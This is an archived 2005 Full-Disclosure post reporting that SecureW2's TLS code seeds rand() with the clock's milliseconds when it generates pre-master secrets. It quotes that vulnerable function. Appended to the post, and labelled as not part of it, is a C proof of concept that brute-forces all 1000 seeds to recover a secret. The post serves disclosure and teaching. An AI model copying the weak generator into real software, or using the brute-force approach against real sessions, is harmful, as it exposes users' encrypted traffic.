[Full-disclosure] SecureW2 TLS security problem
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] SecureW2 TLS security problem
- From: Simon Josefsson <jas@xxxxxxxxxxx>
- Date: Fri, 23 Sep 2005 12:14:00 +0200
Hi everyone! I was looking at the code for a TLS implementation, an
open source implementation "SecureW2" by Alfa & Ariss, see:
http://www.securew2.com/uk/index.htm
I found that it uses weak random numbers when generating the
pre-master-secret. The code is in
"./Components/Common/release 3/version 0/source/CommonTLS.c" and quoted below.
It appears to be using the weak srand/rand functions seeded by the
milliseconds field from the system clock. That doesn't provide you
with 48 bytes of strong randomness; you are lucky to get even a few
bytes.
Regards,
Simon
//
// Name: TLSGenPMS
// Description: Generate the 48 random bytes for the PMS (Pre Master Secret)
// Author: Tom Rixom
// Created: 17 December 2002
//
DWORD
TLSGenPMS( IN OUT BYTE pbPMS[TLS_PMS_SIZE] )
{
    int         i = 0;
    SYSTEMTIME  SystemTime;
    DWORD       dwRet;

    dwRet = NO_ERROR;

    AA_TRACE( ( TEXT( "TLSGenPMS" ) ) );

    // First two bytes carry the client version (TLS 1.0 = 3.1)
    pbPMS[0] = 0x03;
    pbPMS[1] = 0x01;

    //
    // Time (DWORD)
    //
    // The seed is only the millisecond field (0..999), so at most
    // 1000 distinct pre-master secrets can ever be produced.
    GetLocalTime( &SystemTime );
    srand( ( unsigned int ) SystemTime.wMilliseconds );
    //srand( ( unsigned )time( NULL ) );

    //
    // Random bytes
    //
    // rand() % 255 yields 0..254, so the byte 0xFF never appears.
    for( i=2; i < TLS_PMS_SIZE; i++ )
        pbPMS[i] = ( BYTE ) ( rand() % 255 );

    AA_TRACE( ( TEXT( "TLSGenPMS::random bytes: %s" ), AA_ByteToHex( pbPMS, TLS_PMS_SIZE ) ) );

    return dwRet;
}
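To make the size of the problem concrete, here is an added example (not SecureW2 code and not from the original post) that reproduces the generator above and then recovers the pre-master secret by trying every possible seed. It assumes the target was built against the Microsoft C runtime, whose rand() is the 214013/2531011 LCG implemented below; the fingerprint check is a constructed stand-in for what a real attacker would do with each candidate (derive the master secret and keys and verify the Finished message), since RSA-encrypted ClientKeyExchange blobs cannot be compared directly.

```c
/* Added example: brute-forcing a pre-master secret generated like
 * TLSGenPMS. Not part of SecureW2; the MSVC rand() model and the
 * fingerprint oracle are assumptions made for this demonstration. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PMS_SIZE 48
#define MS_SEEDS 1000          /* wMilliseconds only ranges over 0..999 */

/* Assumed generator: Microsoft CRT rand() (LCG, 15-bit output). */
static uint32_t msvc_state;
static void msvc_srand(unsigned int seed) { msvc_state = seed; }
static int msvc_rand(void)
{
    msvc_state = msvc_state * 214013u + 2531011u;
    return (int)((msvc_state >> 16) & 0x7fff);
}

/* Same construction as TLSGenPMS: version bytes, then rand() % 255. */
void weak_gen_pms(unsigned int ms_seed, uint8_t pms[PMS_SIZE])
{
    pms[0] = 0x03;
    pms[1] = 0x01;
    msvc_srand(ms_seed);
    for (int i = 2; i < PMS_SIZE; i++)
        pms[i] = (uint8_t)(msvc_rand() % 255);
}

/* Constructed oracle: a 64-bit FNV-1a fingerprint standing in for
 * "derive keys from this candidate and check the Finished MAC". */
uint64_t fingerprint(const uint8_t *buf, size_t n)
{
    uint64_t h = 0xcbf29ce484222325ull;
    for (size_t i = 0; i < n; i++) {
        h ^= buf[i];
        h *= 0x100000001b3ull;
    }
    return h;
}

/* Try all 1000 seeds; return the matching seed (or -1) and the PMS. */
int recover_pms(uint64_t target_fp, uint8_t out[PMS_SIZE])
{
    for (unsigned int s = 0; s < MS_SEEDS; s++) {
        weak_gen_pms(s, out);
        if (fingerprint(out, PMS_SIZE) == target_fp)
            return (int)s;
    }
    return -1;
}

/* Returns 1 if a secret generated at millisecond `ms` is recovered
 * exactly (same seed, same 48 bytes) by the brute force above. */
int demo_recovers(unsigned int ms)
{
    uint8_t victim[PMS_SIZE], found[PMS_SIZE];
    weak_gen_pms(ms, victim);
    int s = recover_pms(fingerprint(victim, PMS_SIZE), found);
    return s == (int)ms && memcmp(victim, found, PMS_SIZE) == 0;
}

/* Second defect: rand() % 255 never yields 0xFF. Counts 0xFF bytes
 * over every reachable secret; the result is always 0. */
int count_ff_bytes(void)
{
    uint8_t pms[PMS_SIZE];
    int count = 0;
    for (unsigned int s = 0; s < MS_SEEDS; s++) {
        weak_gen_pms(s, pms);
        for (int i = 2; i < PMS_SIZE; i++)
            if (pms[i] == 0xFF)
                count++;
    }
    return count;
}

int main(void)
{
    /* Constructed scenario: the handshake happened at ms = 417. */
    printf("recovered: %s\n", demo_recovers(417) ? "yes" : "no");
    printf("0xFF bytes across all %d secrets: %d\n",
           MS_SEEDS, count_ff_bytes());
    printf("effective entropy: under 10 bits instead of 368\n");
    return 0;
}
```

The search space is 1000 candidates regardless of how the handshake was captured, so the RSA key exchange protects nothing here; a passive observer of one session can recover its keys as quickly as the server itself.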
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/